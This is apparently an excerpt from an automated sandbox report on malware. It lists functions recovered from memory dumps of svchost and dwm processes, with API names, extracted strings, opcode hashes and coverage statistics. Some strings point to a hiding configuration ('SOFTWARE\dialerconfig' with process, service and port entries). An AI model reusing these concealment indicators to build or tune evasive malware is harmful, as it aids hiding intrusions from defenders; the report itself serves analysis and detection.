                                                                          • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                          • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                          • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: a3c0edd0877988b553c5cb3f44ac1cf59b63286ea202ec1d8159712ba189bc8b
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 7402A83221AB8486E761CB99E4A479EB7E1F3C4794F104115EA8E97FA9DF7CC484CB00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: c54ef34d66bd00901bd8adbac774be78d0448155a515a9e92ef6434a46babdc8
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 5561EB3661AF48C6E761DB9AE46475AB7E2F388784F500115EA8E97FA8DB7CC440CF40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 33dfdcfffdc3893784a7b309723e3667eaa1db39b5b3fd1c14ced88943099ce3
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 0111E332A10F3141FBA691ECE4753E91AC36F5C37CF49A638A96626ED6CA2CF8405700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 4f18cf734432864d1cadb05385a9f61388192ac32121d651ae8f93e19ceaa8fb
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 38115132A10F9131FB6615E8D4763E611DB6B683F8F180724A97636FD68A24C8414721
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: e363e31868ba0ebea0856da9f2af10226048556fbf55e11a4800ee541c068533
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3261D53A600E40C2FB6BCBE4E9703EE2AE3E785780F554415CA5A37FA4DB34D8499B40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction ID: 14cf2eee4fbcc911eae32f8475549afe507b7b7c46814838016a04d8a23f088c
                                                                          • Opcode Fuzzy Hash: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction Fuzzy Hash: DD614932602A888AEB21DFA9D4503DD7BE2F354B8CF045215EF4967B98DB39D595C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 2a90534c08ec7fa08356974faa6f23fad74bcd69915b4cf882117b33a0582183
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: A451E076101B88CAEB768FA994A43D87BE2F355B85F184116DA89E7FD5CB39C490CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                          • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                          • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                          • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                          • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                          Execution Graph

                                                                          Execution Coverage:1.7%
                                                                          Dynamic/Decrypted Code Coverage:95.6%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:135
                                                                          Total number of Limit Nodes:16

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 6161e3e51d841b3d053d37747076618646d68d4b7c54ebfdfb68af91052e3cd0
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 4371D576610B1086EB149F65E8906DD23A4FB88B99F809161FF4E97B6DEF3AC4C4C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: cb49a6d8150499ea34a3f095df7715ccaf74ac4ae549242de21977aa6f21db4f
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 9A115E36705B4183EF589B21F4082E9A2A0F78CB95F4440A9FF8907768EF3EC585C704

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction ID: 8692bfab2a7213d6ae5d3640dfdc91a5e4d399c362645174dc3f24ccf36dcf03
                                                                          • Opcode Fuzzy Hash: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction Fuzzy Hash: 41D17576609B8886DA749B0AE49439A7BA0F7CCB84F100156EF8D47BA9DF3DC591CB40

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
